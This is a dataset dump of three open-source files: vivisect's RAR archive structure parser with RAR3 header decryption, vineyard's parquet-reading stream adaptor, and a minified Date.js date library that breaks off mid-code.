id
stringlengths 1
8
| text
stringlengths 6
1.05M
| dataset_id
stringclasses 1
value |
---|---|---|
/vivisect-1.1.1-py3-none-any.whl/vstruct/defs/rar.py
|
import binascii
import hashlib
import logging
import os
import struct
import sys

import vstruct
from vstruct.primitives import *
#HEAD_TYPE_MARKER = 0x72 #marker block
#HEAD_TYPE_ARCHIVE = 0x73 #archive header
#HEAD_TYPE_FILE_HDR = 0x74 #file header
#HEAD_TYPE_OLD_COMMENT = 0x75 #old style comment header
#HEAD_TYPE_OLD_AUTH = 0x76 #old style authenticity information
#HEAD_TYPE_OLD_SUBBLOCK = 0x77 #old style subblock
#HEAD_TYPE_OLD_RECOVERY = 0x78 #old style recovery record
#HEAD_TYPE_OLD_AUTH2 = 0x79 #old style authenticity information
#HEAD_TYPE_SUBBLOCK = 0x7a #subblock
SFX_MODMAX = 1024000 # one meg
RAR4_SIGNATURE = binascii.unhexlify('526172211a0700')
RAR5_SIGNATURE = binascii.unhexlify('526172211a070100')

def getRarOffset(fd):
    '''
    Scan the beginning of a file-like object for a RAR signature
    (covers SFX archives where the marker is not at offset 0).

    Returns a ( (major,minor,micro), offset ) tuple where offset points
    just past the signature, or None when no signature is found.  The
    file position of fd is left unchanged.
    '''
    startpos = fd.tell()
    sfxblob = fd.read(SFX_MODMAX * 2)
    fd.seek(startpos)
    # RAR5 is checked first, matching the original priority.
    for version, signature in (((5, 0, 0), RAR5_SIGNATURE),
                               ((4, 0, 0), RAR4_SIGNATURE)):
        found = sfxblob.find(signature)
        if found != -1:
            return (version, found + len(signature))
    return None
# Header Types (RAR4 block HEAD_TYPE values)
MARK_HEAD = 0x72
MAIN_HEAD = 0x73
FILE_HEAD = 0x74
COMM_HEAD = 0x75
AV_HEAD = 0x76
SUB_HEAD = 0x77
PROTECT_HEAD = 0x78
SIGN_HEAD = 0x79
NEWSUB_HEAD = 0x7a
ENDARC_HEAD = 0x7b

# Main Header Flags (MHD_*)
MHD_VOLUME = 0x0001
MHD_COMMENT = 0x0002
MHD_LOCK = 0x0004
MHD_SOLID = 0x0008
MHD_PACK_COMMENT = 0x0010
MHD_AV = 0x0020
MHD_PROTECT = 0x0040
MHD_PASSWORD = 0x0080 # The archive is password encrypted
MHD_FIRSTVOLUME = 0x0100
MHD_ENCRYPTVER = 0x0200

# File (local) header flags (LHD_*)
LHD_SPLIT_BEFORE = 0x0001
LHD_SPLIT_AFTER = 0x0002
LHD_PASSWORD = 0x0004
LHD_COMMENT = 0x0008
LHD_SOLID = 0x0010
# Dictionary window size is encoded in the LHD_WINDOWMASK bits.
LHD_WINDOWMASK = 0x00e0
LHD_WINDOW64 = 0x0000
LHD_WINDOW128 = 0x0020
LHD_WINDOW256 = 0x0040
LHD_WINDOW512 = 0x0060
LHD_WINDOW1024 = 0x0080
LHD_WINDOW2048 = 0x00a0
LHD_WINDOW4096 = 0x00c0
LHD_DIRECTORY = 0x00e0
LHD_LARGE = 0x0100
LHD_UNICODE = 0x0200
LHD_SALT = 0x0400
LHD_VERSION = 0x0800
LHD_EXTTIME = 0x1000
LHD_EXTFLAGS = 0x2000
SKIP_IF_UNKNOWN = 0x4000
LONG_BLOCK = 0x8000

# Crypto related sizes (bytes) and KDF/cipher versions
SIZE_SALT30 = 8
SIZE_SALT50 = 16
SIZE_IV = 16
CRYPT_NONE = 0
CRYPT_RAR13 = 1
CRYPT_RAR15 = 2
CRYPT_RAR20 = 3
CRYPT_RAR30 = 4
CRYPT_RAR50 = 5
CRYPT_BLOCKSIZE = 16
class RarChunkUnkn(vstruct.VStruct):
    '''Generic fallback container that captures raw, unparsed chunk bytes.'''

    def __init__(self):
        super().__init__()
        self.CHUNK_BYTES = v_bytes()
class MainHeader(vstruct.VStruct):
    '''Standalone layout for the RAR4 main-header payload (AV position fields).'''

    def __init__(self):
        super().__init__()
        self.HighPosAV = v_uint16()
        self.PosAV = v_uint32()
        self.EncryptVer = v_uint8()
#class Rar4BaseBlock
class Rar4Block(vstruct.VStruct):
    '''
    Common 7-byte RAR4 block header (crc, type, flags, size) followed by a
    nested HEAD_DATA struct that subclasses populate with type-specific fields.
    '''

    def __init__(self):
        super().__init__()
        self.HEAD_CRC = v_uint16()
        self.HEAD_TYPE = v_uint8()
        self.HEAD_FLAGS = v_uint16()
        self.HEAD_SIZE = v_uint16()
        self.HEAD_DATA = vstruct.VStruct()
class MAIN_HEADER(Rar4Block):
    # RAR4 archive (main) header: AV position fields appended to the base block.
    def __init__(self):
        Rar4Block.__init__(self)
        self.HEAD_DATA.HighPosAv = v_uint16()
        self.HEAD_DATA.PosAV = v_uint32()
        # NOTE(review): HEAD_FLAGS is still 0 at construction time (it is only
        # populated when the struct is parsed), so this branch can never add
        # EncryptVer here -- it likely needs a parse callback like the
        # NameSize handling in FILE_HEADER.  TODO confirm against vstruct
        # parse-callback semantics before changing.
        if self.HEAD_FLAGS & MHD_ENCRYPTVER:
            self.HEAD_DATA.EncryptVer = v_uint8()
class FILE_HEADER(Rar4Block):
    '''
    RAR4 file header block: packed/unpacked sizes, CRC, timestamp, method
    and the length-prefixed file name (resized via a NameSize parse callback).
    '''
    def __init__(self):
        Rar4Block.__init__(self)
        self.HEAD_DATA.PackSize = v_uint32()
        self.HEAD_DATA.UnpSize = v_uint32()
        self.HEAD_DATA.HostOs = v_uint8()
        self.HEAD_DATA.FileCrc = v_uint32()
        self.HEAD_DATA.FileTime = v_uint32()
        self.HEAD_DATA.UnpVer = v_uint8()
        self.HEAD_DATA.Method = v_uint8()
        self.HEAD_DATA.NameSize = v_uint16()
        self.HEAD_DATA.FileAttr = v_uint32()
        # NOTE(review): HEAD_FLAGS is 0 at construction time (only populated
        # during parsing), so the flag-dependent branches below can never fire
        # here -- they would need parse callbacks like NameSize.  TODO confirm
        # against vstruct parse-callback semantics.
        if self.HEAD_FLAGS & LHD_LARGE:
            self.HEAD_DATA.HighPackSize = v_uint32()
            self.HEAD_DATA.HighUnpSize = v_uint32()
        filename = v_str()
        self.HEAD_DATA.FileName = filename
        if self.HEAD_FLAGS & LHD_SALT:
            self.HEAD_DATA.Salt = v_bytes(size=8)
        if self.HEAD_FLAGS & LHD_EXTTIME:
            # fixed typo in the raised message ("supprort" -> "support")
            raise Exception("FIXME support LHD_EXTTIME")
        def setFileNameSize(x):
            # Resize the FileName field once NameSize has been parsed.
            filename.vsSetLength( self.HEAD_DATA.NameSize )
        self.HEAD_DATA.vsAddParseCallback('NameSize',setFileNameSize)
#self.HEAD_PAD = vstruct.VStruct()
#self.ADD_SIZE = v_uint32()
#self.BLOCK_DATA = vstruct.VStruct()
#self._known_block = False
#def pcb_HEAD_DATA(self):
#remain = len(self) % 16
#if remain:
#self.HEAD_PAD.pad = v_bytes(size=16-remain)
#def pcb_HEAD_SIZE(self):
#if self.HEAD_TYPE == MAIN_HEAD:
#self.HEAD_DATA.HighPosAv = v_uint16()
#self.HEAD_DATA.PosAV = v_uint32()
#if self.HEAD_FLAGS & MHD_ENCRYPTVER:
#self.HEAD_DATA.EncryptVer = v_uint8()
#return
#if self.HEAD_TYPE == FILE_HEAD:
#self.HEAD_DATA.PackSize = v_uint32()
#self.HEAD_DATA.UnpSize = v_uint32()
#self.HEAD_DATA.HostOs = v_uint8()
#self.HEAD_DATA.FileCrc = v_uint32()
#self.HEAD_DATA.FileTime = v_uint32()
#self.HEAD_DATA.UnpVer = v_uint8()
#self.HEAD_DATA.Method = v_uint8()
#self.HEAD_DATA.NameSize = v_uint16()
#self.HEAD_DATA.FileAttr = v_uint32()
#if self.HEAD_FLAGS & LHD_LARGE:
#self.HEAD_DATA.HighPackSize = v_uint32()
#self.HEAD_DATA.HighUnpSize = v_uint32()
#filename = v_str()
#self.HEAD_DATA.FileName = filename
#if self.HEAD_FLAGS & LHD_SALT:
#self.HEAD_DATA.Salt = v_bytes(size=8)
#if self.HEAD_FLAGS & LHD_EXTTIME:
#raise Exception("FIXME supprort LHD_EXTTIME")
#def setFileNameSize(x):
#filename.vsSetLength( self.HEAD_DATA.NameSize )
#self.HEAD_DATA.vsAddParseCallback('NameSize',setFileNameSize)
#return
#self.HEAD_DATA.NameSize = v_uint32()
#self.HEAD_DATA.NameSize = v_uint32()
#if not self.HEAD_FLAGS & MHD_ENCRYPTVER:
#self.BLOCK_DATA.EncryptVer = vstruct.VStruct()
#def pcb_HEAD_FLAGS(self):
## a proto callback for the header
#if self.HEAD_FLAGS & LONG_BLOCK:
#self.ADD_SIZE = v_uint32()
#else:
#self.ADD_SIZE = vstruct.VStruct()
#if self.HEAD_TYPE == MAIN_HEAD and self.HEAD_FLAGS & MHD_PASSWORD:
#self.BLOCK_DATA.Salt = v_bytes(size=8)
#def pcb_ADD_SIZE(self):
# first things first, needs salt?
#if self.HEAD_FLAGS & MHD_PASSWORD:
#self.BLOCK_DATA.Salt = v_bytes(size=8)
#hsize = 7
#totsize = self.HEAD_SIZE
#
#if not isinstance(self.ADD_SIZE, vstruct.VStruct):
#hsize += 4
#totsize += self.ADD_SIZE
# We will *now* use TYPE to find out our chunk guts
#if not self._known_block:
#self.BLOCK_DATA = v_bytes(totsize - hsize)
import hashlib

# RAR3 key-derivation parameters: 0x40000 iterated sha1 rounds; one IV byte
# is harvested every rounds/16 iterations.  Integer division is required
# because the quotient is used as a list index (py3 `/` yields a float).
rounds = 0x40000
roundsdiv = rounds // 16
#iblist = [ struct.pack('<I',i)[:3] for i in range(rounds) ]
def initIvKey30(passwd, salt, rounds=0x40000):
    '''
    Derive the RAR3 ("crypt version 30") AES IV and key from a password
    and the 8 byte header salt.

    passwd - unicode password (hashed as utf-16le)
    salt   - salt bytes read from the archive header
    rounds - sha1 iteration count; must be a positive multiple of 16.
             Defaults to the RAR3 spec value 0x40000 (parameterized for
             testability; callers passing two args get original behavior).

    Returns (iv, key) as a tuple of two 16 byte bytes objects.
    '''
    ivstep = rounds // 16  # one IV byte is harvested every ivstep rounds
    aesiv = bytearray(16)
    initkey = passwd.encode('utf-16le') + salt
    sha1hash = hashlib.sha1()
    # crazy russian awesomeness/paranoia: iterated sha1 with a 3 byte
    # little-endian round counter mixed in each iteration.
    for i in range(rounds):
        sha1hash.update(initkey)
        sha1hash.update(struct.pack('<I', i)[:3])
        if i % ivstep == 0:
            # py3 fixes vs the original: digest() yields ints, so collect
            # into a bytearray, and index with // (/ produced a float index).
            aesiv[i // ivstep] = sha1hash.digest()[-1]
    # The key is the first 16 digest bytes with each 32 bit word byte-swapped.
    endswap = struct.unpack_from('<4I', sha1hash.digest())
    aeskey = struct.pack('>4I', *endswap)
    return bytes(aesiv), aeskey
def aesInit(iv,key):
    '''
    Build an AES-CBC cipher context from the derived IV and key.
    PyCrypto/PyCryptodome is imported lazily so it is only required
    when dealing with encrypted archives.
    '''
    from Crypto.Cipher import AES
    return AES.new(key, AES.MODE_CBC, iv)
class NoRarFd(Exception):
    '''Raised when an API needing a parsed file descriptor is used before one is set.'''


class MissingRarSig(Exception):
    '''Raised when no RAR4/RAR5 signature can be located in the input.'''


class PasswordRequired(Exception):
    '''Raised when the archive headers are encrypted and no password was given.'''
# HEAD_TYPE -> specialized parser class; types without an entry fall back
# to the generic Rar4Block during block iteration.
rar4blocks = {
    FILE_HEAD:FILE_HEADER,
}
class Rar:
    '''
    Minimal RAR archive reader.  Locates the RAR signature, parses the
    MAIN_HEADER and, for RAR3-style encrypted-header archives, transparently
    decrypts header data once a password has been supplied.
    '''

    def __init__(self, fd=None):
        self.fd = None        # file-like object for the archive
        self.aes = None       # AES-CBC context once setFilePasswd() is called
        self.salt = None      # 8 byte header salt (MHD_PASSWORD archives only)
        self.offset = None    # file offset just past the RAR signature
        self.trybuf = None    # cached first encrypted block for tryFilePasswd()
        self.clearbuf = b''   # decrypted-but-unconsumed bytes (py3 fix: bytes, not str)
        self.version = None   # (major, minor, micro) tuple from the signature
        self.mainhead = None  # parsed MAIN_HEADER
        if fd is not None:
            self.parseRarHeader(fd)

    def parseRarHeader(self, fd):
        '''
        Find the RAR signature in fd and parse the main header.
        Raises MissingRarSig when no signature is present.
        '''
        veroff = getRarOffset(fd)
        if veroff is None:
            raise MissingRarSig()
        self.fd = fd
        self.version = veroff[0]
        self.offset = veroff[1]
        self.fd.seek(self.offset)
        self.mainhead = MAIN_HEADER()
        self.mainhead.vsParseFd(self.fd)
        # Encrypted-header archives store the KDF salt right after the header.
        if self.mainhead.HEAD_FLAGS & MHD_PASSWORD:
            self.salt = self.fd.read(SIZE_SALT30)

    def _req_fd(self):
        # Guard for APIs that need a previously parsed file descriptor.
        if self.fd is None:
            raise NoRarFd()

    def tryFilePasswd(self, passwd):
        '''
        Check the passwd against the next encrypted header
        ( which should be of type FILE_HEAD )
        '''
        if self.trybuf is None:
            # Cache the first encrypted block so repeated attempts do not
            # disturb the file position.
            curloc = self.fd.tell()
            self.trybuf = self.fd.read(16)
            self.fd.seek(curloc)
        iv, key = initIvKey30(passwd, self.salt)
        aes = aesInit(iv, key)
        clearbuf = aes.decrypt(self.trybuf)
        crc, ctype, cflags, csize = struct.unpack_from('<HBHH', clearbuf)
        return ctype == FILE_HEAD

    def setFilePasswd(self, passwd):
        '''
        Used to set the file-wide password for decryption.
        '''
        iv, key = initIvKey30(passwd, self.salt)
        self.aes = aesInit(iv, key)

    def read(self, size):
        '''
        Read size bytes, transparently decrypting when a password is set.
        May return fewer than size bytes at end of file.
        '''
        if self.aes is None:
            return self.fd.read(size)
        while len(self.clearbuf) < size:
            crypted = self.fd.read(4096)
            if not crypted:
                # EOF fix: the original looped forever on truncated input.
                break
            self.clearbuf += self.aes.decrypt(crypted)
        ret = self.clearbuf[:size]
        self.clearbuf = self.clearbuf[size:]
        return ret

    def iterRar4Files(self):
        '''
        Walk the RAR4 block chain, logging each parsed block, until the
        end-of-archive block (or EOF) is reached.
        Raises PasswordRequired for encrypted headers with no password set.
        '''
        if self.salt is not None and self.aes is None:
            raise PasswordRequired()
        # original referenced an undefined `logger`; resolve one explicitly
        logger = logging.getLogger(__name__)
        while True:
            hdr = self.read(7)
            if len(hdr) < 7:
                break  # truncated archive / EOF
            crc, ctype, cflags, csize = struct.unpack('<HBHH', hdr)
            body = self.read(csize - 7)
            rar4 = Rar4Block()
            rar4.vsParse(hdr)
            # Re-parse with the specialized class when the type is known.
            cls = rar4blocks.get(rar4.HEAD_TYPE)
            if cls is not None:
                rar4 = cls()
                rar4.vsParse(hdr + body)
            logger.info(rar4.tree())
            if ctype == ENDARC_HEAD:
                break
#self.HEAD_CRC = v_uint16()
#self.HEAD_TYPE = v_uint8()
#self.HEAD_FLAGS = v_uint16()
#self.HEAD_SIZE = v_uint16()
def main():
    # Ad-hoc CLI test harness: usage `rar.py <rarfile> <password>`.
    # TODO: Does this even work anymore?
    offset = 0
    with open(sys.argv[1], 'rb') as fd:
        testpass = sys.argv[2]
        rar = Rar()
        rar.parseRarHeader(fd)
        rar.mainhead.tree()
        #logger.info("FAIL TEST",rar.tryFilePasswd('asdf'))
        #logger.info("PASS TEST",rar.tryFilePasswd(testpass))
        rar.setFilePasswd(testpass)
        rar.iterRar4Files()
        #for x in rar.iterRar4Chunks():
        #print x
        return
        # NOTE(review): everything below is unreachable (dead debug code from
        # an earlier manual-parsing experiment) -- candidate for deletion.
        buf = fd.read(1024000)
        offset = 0
        rar4 = Rar4Block()
        offset = rar4.vsParse(buf,offset=offset)
        print(rar4.tree())
        salt = buf[offset:offset+SIZE_SALT30]
        print('SALT %s' % binascii.hexlify(salt))
        offset += SIZE_SALT30
        iv,key = initIvKey30(testpass,salt)
        #print('IV %s' % binascii.hexlify(iv))
        #print('KEY %s' % binascii.hexlify(key))
        aes = aesInit(iv,key)
        #print(binascii.hexlify(aes.decrypt(buf[offset:offset+64])))
        x = aes.decrypt(buf[offset:offset+64])
        rar4 = Rar4Block()
        rar4.vsParse(x)
        #offset = rar4.vsParse(buf,offset=offset)
        print(rar4.tree())
        #while offset < len(b):
        #r = RarBlock()
        #newoff = r.vsParse(b, offset=offset)
        #print 'CRC',r.HEAD_CRC,r.HEAD_TYPE
        #print r.tree(va=offset)
        #offset = newoff

if __name__ == '__main__':
    sys.exit(main())
|
PypiClean
|
/vineyard_io-0.16.5-py3-none-any.whl/vineyard/drivers/io/adaptors/read_parquet.py
|
import base64
import json
import logging
import sys
import traceback
from typing import Dict
import cloudpickle
import fsspec
import fsspec.implementations.arrow
from fsspec.core import get_fs_token_paths
import vineyard
from vineyard.data.utils import str_to_bool
from vineyard.io.dataframe import DataframeStream
from vineyard.io.utils import expand_full_path
from vineyard.io.utils import report_error
from vineyard.io.utils import report_exception
from vineyard.io.utils import report_success
logger = logging.getLogger('vineyard')

try:
    # Importing registers the extra fsspec filesystems (hdfs, oss, ...) as a
    # side effect; a missing adaptor only disables those URL schemes, so the
    # failure is deliberately non-fatal.
    from vineyard.drivers.io import fsspec_adaptors
except Exception:  # pylint: disable=broad-except
    logger.warning("Failed to import fsspec adaptors for hdfs, oss, etc.")
def make_empty_batch(schema):
    """Build a zero-row pyarrow RecordBatch carrying the given schema."""
    import pyarrow

    empty_arrays = [pyarrow.array([], field_type) for field_type in schema.types]
    return pyarrow.RecordBatch.from_arrays(empty_arrays, schema.names)
def read_parquet_blocks(
    client, fs, path, read_options, proc_num, proc_index, writer, chunks
):
    """Read one parquet file and emit this worker's share of row groups.

    Row groups are partitioned evenly across ``proc_num`` workers and this
    worker (``proc_index``) reads only its own slice.  Each batch is either
    written to ``writer`` (stream mode) or ``put`` into vineyard and appended
    to ``chunks`` (accumulate mode).  When this worker has no row groups, a
    single empty batch carrying the file schema is emitted so downstream
    consumers still observe the schema.
    """
    import pyarrow.parquet

    columns = read_options.get('columns', None)
    kwargs = {}
    if columns:
        kwargs['columns'] = columns.split(',')
    chunk_hook = read_options.get('chunk_hook', None)
    with fs.open(path, 'rb') as f:
        reader = pyarrow.parquet.ParquetFile(f)
        row_groups_per_proc = reader.num_row_groups // proc_num
        if reader.num_row_groups % proc_num != 0:
            row_groups_per_proc += 1
        row_group_begin = row_groups_per_proc * proc_index
        row_group_end = min(
            row_groups_per_proc * (proc_index + 1), reader.num_row_groups
        )
        if row_group_begin < row_group_end:
            # BUG FIX: the original re-assigned `kwargs = {}` here, silently
            # discarding the 'columns' selection computed above.
            for batch in reader.iter_batches(
                row_groups=range(row_group_begin, row_group_end),
                use_threads=False,
                **kwargs,
            ):
                if chunk_hook is not None:
                    batch = chunk_hook(batch)
                if writer is not None:
                    writer.write(batch)
                else:
                    chunks.append(client.put(batch.to_pandas(), persist=True))
        else:
            batch = make_empty_batch(reader.schema_arrow)
            if writer is not None:
                writer.write(batch)
            else:
                chunks.append(client.put(batch.to_pandas(), persist=True))
def read_bytes(  # noqa: C901, pylint: disable=too-many-statements
    vineyard_socket: str,
    path: str,
    storage_options: Dict,
    read_options: Dict,
    proc_num: int,
    proc_index: int,
    accumulate: bool = False,
):
    """Read parquet files from external storage and produce a DataframeStream
    (or, with ``accumulate=True``, a list of persisted vineyard objects).

    Args:
        vineyard_socket (str): Ipc socket
        path (str): External storage path (or glob pattern) to read from
        storage_options (dict): Configurations of external storage
        read_options (dict): Additional options that could control the
                             behavior of read, e.g. 'columns' (comma
                             separated names) and 'chunk_hook' (a callable
                             applied to each record batch)
        proc_num (int): Total amount of process
        proc_index (int): The sequence of this process
        accumulate (bool): When True, put each batch into vineyard and report
                           the object ids instead of writing to a stream.
    Raises:
        ValueError: If the stream is invalid.
    """
    client = vineyard.connect(vineyard_socket)
    try:
        # files would be empty if it's a glob pattern and globbed nothing.
        fs, _, files = get_fs_token_paths(path, storage_options=storage_options)
    except Exception:  # pylint: disable=broad-except
        report_error(
            f"Cannot initialize such filesystem for '{path}', "
            f"exception is:\n{traceback.format_exc()}"
        )
        sys.exit(-1)
    # Explicit check instead of the original `assert files` (asserts are
    # stripped under `python -O`).
    if not files:
        report_error(f"Cannot find such files for '{path}'")
        sys.exit(-1)
    files = sorted(files)
    stream, writer, chunks = None, None, []
    try:
        for index, file_path in enumerate(files):
            if index == 0 and not accumulate:
                # Create/announce the stream lazily on the first file only.
                stream = DataframeStream.new(client, {})
                client.persist(stream.id)
                report_success(stream.id)
                writer = stream.open_writer(client)
            read_parquet_blocks(
                client,
                fs,
                file_path,
                read_options,
                proc_num,
                proc_index,
                writer,
                chunks,
            )
        if writer is not None:
            writer.finish()
        else:
            report_success(json.dumps([repr(vineyard.ObjectID(k)) for k in chunks]))
    except Exception:  # pylint: disable=broad-except
        report_exception()
        if writer is not None:
            writer.fail()
        sys.exit(-1)
def main():
    """Command-line entry point; see the usage string for argument order.

    ``storage_options`` and ``read_options`` arrive as base64-encoded JSON
    so they survive being passed through process arguments.
    """
    # Seven positional arguments are required, so argv needs >= 8 entries.
    # (The original checked `< 7`, off by one: sys.argv[7] is read below.)
    if len(sys.argv) < 8:
        print(
            "usage: ./read_parquet <ipc_socket> <path> <storage_options> "
            "<read_options> <accumulate> <proc_num> <proc_index>"
        )
        sys.exit(1)
    ipc_socket = sys.argv[1]
    path = expand_full_path(sys.argv[2])
    storage_options = json.loads(
        base64.b64decode(sys.argv[3].encode("utf-8")).decode("utf-8")
    )
    read_options = json.loads(
        base64.b64decode(sys.argv[4].encode("utf-8")).decode("utf-8")
    )
    if 'chunk_hook' in read_options:
        # The chunk hook travels as a base64-encoded cloudpickle'd callable.
        read_options['chunk_hook'] = cloudpickle.loads(
            base64.b64decode(read_options['chunk_hook'].encode('ascii'))
        )
    accumulate = str_to_bool(sys.argv[5])
    proc_num = int(sys.argv[6])
    proc_index = int(sys.argv[7])
    read_bytes(
        ipc_socket,
        path,
        storage_options,
        read_options,
        proc_num,
        proc_index,
        accumulate=accumulate,
    )


if __name__ == "__main__":
    main()
|
PypiClean
|
/django-xadmin-0.5.0.tar.gz/django-xadmin-0.5.0/xadmin/static/xadmin/vendor/datejs/build/core.js
|
// Vendored, minified Date.js "core" build (bundled with xadmin's datejs
// assets).  Extends Date and Date.prototype with: clearTime/setTimeToNow,
// today(), compare/equals, name<->number lookups via Date.CultureInfo,
// leap-year and days-in-month helpers, timezone abbreviation/offset lookup,
// add{Milliseconds..Years}/add(config), week-number math (getWeek/getISOWeek/
// setWeek), field validation + set(config), moveTo* navigation helpers, UTC
// offset helpers, a toISOString polyfill, and a pattern-based toString(format).
// NOTE(review): minified vendor code -- do not hand-edit; update from upstream.
(function(){var $D=Date,$P=$D.prototype,$C=$D.CultureInfo,p=function(s,l){if(!l){l=2;}
return("000"+s).slice(l*-1);};$P.clearTime=function(){this.setHours(0);this.setMinutes(0);this.setSeconds(0);this.setMilliseconds(0);return this;};$P.setTimeToNow=function(){var n=new Date();this.setHours(n.getHours());this.setMinutes(n.getMinutes());this.setSeconds(n.getSeconds());this.setMilliseconds(n.getMilliseconds());return this;};$D.today=function(){return new Date().clearTime();};$D.compare=function(date1,date2){if(isNaN(date1)||isNaN(date2)){throw new Error(date1+" - "+date2);}else if(date1 instanceof Date&&date2 instanceof Date){return(date1<date2)?-1:(date1>date2)?1:0;}else{throw new TypeError(date1+" - "+date2);}};$D.equals=function(date1,date2){return(date1.compareTo(date2)===0);};$D.getDayNumberFromName=function(name){var n=$C.dayNames,m=$C.abbreviatedDayNames,o=$C.shortestDayNames,s=name.toLowerCase();for(var i=0;i<n.length;i++){if(n[i].toLowerCase()==s||m[i].toLowerCase()==s||o[i].toLowerCase()==s){return i;}}
return-1;};$D.getMonthNumberFromName=function(name){var n=$C.monthNames,m=$C.abbreviatedMonthNames,s=name.toLowerCase();for(var i=0;i<n.length;i++){if(n[i].toLowerCase()==s||m[i].toLowerCase()==s){return i;}}
return-1;};$D.isLeapYear=function(year){return((year%4===0&&year%100!==0)||year%400===0);};$D.getDaysInMonth=function(year,month){return[31,($D.isLeapYear(year)?29:28),31,30,31,30,31,31,30,31,30,31][month];};$D.getTimezoneAbbreviation=function(offset){var z=$C.timezones,p;for(var i=0;i<z.length;i++){if(z[i].offset===offset){return z[i].name;}}
return null;};$D.getTimezoneOffset=function(name){var z=$C.timezones,p;for(var i=0;i<z.length;i++){if(z[i].name===name.toUpperCase()){return z[i].offset;}}
return null;};$P.clone=function(){return new Date(this.getTime());};$P.compareTo=function(date){return Date.compare(this,date);};$P.equals=function(date){return Date.equals(this,date||new Date());};$P.between=function(start,end){return this.getTime()>=start.getTime()&&this.getTime()<=end.getTime();};$P.isAfter=function(date){return this.compareTo(date||new Date())===1;};$P.isBefore=function(date){return(this.compareTo(date||new Date())===-1);};$P.isToday=function(){return this.isSameDay(new Date());};$P.isSameDay=function(date){return this.clone().clearTime().equals(date.clone().clearTime());};$P.addMilliseconds=function(value){this.setMilliseconds(this.getMilliseconds()+value);return this;};$P.addSeconds=function(value){return this.addMilliseconds(value*1000);};$P.addMinutes=function(value){return this.addMilliseconds(value*60000);};$P.addHours=function(value){return this.addMilliseconds(value*3600000);};$P.addDays=function(value){this.setDate(this.getDate()+value);return this;};$P.addWeeks=function(value){return this.addDays(value*7);};$P.addMonths=function(value){var n=this.getDate();this.setDate(1);this.setMonth(this.getMonth()+value);this.setDate(Math.min(n,$D.getDaysInMonth(this.getFullYear(),this.getMonth())));return this;};$P.addYears=function(value){return this.addMonths(value*12);};$P.add=function(config){if(typeof config=="number"){this._orient=config;return this;}
var x=config;if(x.milliseconds){this.addMilliseconds(x.milliseconds);}
if(x.seconds){this.addSeconds(x.seconds);}
if(x.minutes){this.addMinutes(x.minutes);}
if(x.hours){this.addHours(x.hours);}
if(x.weeks){this.addWeeks(x.weeks);}
if(x.months){this.addMonths(x.months);}
if(x.years){this.addYears(x.years);}
if(x.days){this.addDays(x.days);}
return this;};var $y,$m,$d;$P.getWeek=function(){var a,b,c,d,e,f,g,n,s,w;$y=(!$y)?this.getFullYear():$y;$m=(!$m)?this.getMonth()+1:$m;$d=(!$d)?this.getDate():$d;if($m<=2){a=$y-1;b=(a/4|0)-(a/100|0)+(a/400|0);c=((a-1)/4|0)-((a-1)/100|0)+((a-1)/400|0);s=b-c;e=0;f=$d-1+(31*($m-1));}else{a=$y;b=(a/4|0)-(a/100|0)+(a/400|0);c=((a-1)/4|0)-((a-1)/100|0)+((a-1)/400|0);s=b-c;e=s+1;f=$d+((153*($m-3)+2)/5)+58+s;}
g=(a+b)%7;d=(f+g-e)%7;n=(f+3-d)|0;if(n<0){w=53-((g-s)/5|0);}else if(n>364+s){w=1;}else{w=(n/7|0)+1;}
$y=$m=$d=null;return w;};$P.getISOWeek=function(){$y=this.getUTCFullYear();$m=this.getUTCMonth()+1;$d=this.getUTCDate();return p(this.getWeek());};$P.setWeek=function(n){return this.moveToDayOfWeek(1).addWeeks(n-this.getWeek());};$D._validate=function(n,min,max,name){if(typeof n=="undefined"){return false;}else if(typeof n!="number"){throw new TypeError(n+" is not a Number.");}else if(n<min||n>max){throw new RangeError(n+" is not a valid value for "+name+".");}
return true;};$D.validateMillisecond=function(value){return $D._validate(value,0,999,"millisecond");};$D.validateSecond=function(value){return $D._validate(value,0,59,"second");};$D.validateMinute=function(value){return $D._validate(value,0,59,"minute");};$D.validateHour=function(value){return $D._validate(value,0,23,"hour");};$D.validateDay=function(value,year,month){return $D._validate(value,1,$D.getDaysInMonth(year,month),"day");};$D.validateMonth=function(value){return $D._validate(value,0,11,"month");};$D.validateYear=function(value){return $D._validate(value,0,9999,"year");};$P.set=function(config){if($D.validateMillisecond(config.millisecond)){this.addMilliseconds(config.millisecond-this.getMilliseconds());}
if($D.validateSecond(config.second)){this.addSeconds(config.second-this.getSeconds());}
if($D.validateMinute(config.minute)){this.addMinutes(config.minute-this.getMinutes());}
if($D.validateHour(config.hour)){this.addHours(config.hour-this.getHours());}
if($D.validateMonth(config.month)){this.addMonths(config.month-this.getMonth());}
if($D.validateYear(config.year)){this.addYears(config.year-this.getFullYear());}
if($D.validateDay(config.day,this.getFullYear(),this.getMonth())){this.addDays(config.day-this.getDate());}
if(config.timezone){this.setTimezone(config.timezone);}
if(config.timezoneOffset){this.setTimezoneOffset(config.timezoneOffset);}
if(config.week&&$D._validate(config.week,0,53,"week")){this.setWeek(config.week);}
return this;};$P.moveToFirstDayOfMonth=function(){return this.set({day:1});};$P.moveToLastDayOfMonth=function(){return this.set({day:$D.getDaysInMonth(this.getFullYear(),this.getMonth())});};$P.moveToNthOccurrence=function(dayOfWeek,occurrence){var shift=0;if(occurrence>0){shift=occurrence-1;}
else if(occurrence===-1){this.moveToLastDayOfMonth();if(this.getDay()!==dayOfWeek){this.moveToDayOfWeek(dayOfWeek,-1);}
return this;}
return this.moveToFirstDayOfMonth().addDays(-1).moveToDayOfWeek(dayOfWeek,+1).addWeeks(shift);};$P.moveToDayOfWeek=function(dayOfWeek,orient){var diff=(dayOfWeek-this.getDay()+7*(orient||+1))%7;return this.addDays((diff===0)?diff+=7*(orient||+1):diff);};$P.moveToMonth=function(month,orient){var diff=(month-this.getMonth()+12*(orient||+1))%12;return this.addMonths((diff===0)?diff+=12*(orient||+1):diff);};$P.getOrdinalNumber=function(){return Math.ceil((this.clone().clearTime()-new Date(this.getFullYear(),0,1))/86400000)+1;};$P.getTimezone=function(){return $D.getTimezoneAbbreviation(this.getUTCOffset());};$P.setTimezoneOffset=function(offset){var here=this.getTimezoneOffset(),there=Number(offset)*-6/10;return this.addMinutes(there-here);};$P.setTimezone=function(offset){return this.setTimezoneOffset($D.getTimezoneOffset(offset));};$P.hasDaylightSavingTime=function(){return(Date.today().set({month:0,day:1}).getTimezoneOffset()!==Date.today().set({month:6,day:1}).getTimezoneOffset());};$P.isDaylightSavingTime=function(){return(this.hasDaylightSavingTime()&&new Date().getTimezoneOffset()===Date.today().set({month:6,day:1}).getTimezoneOffset());};$P.getUTCOffset=function(){var 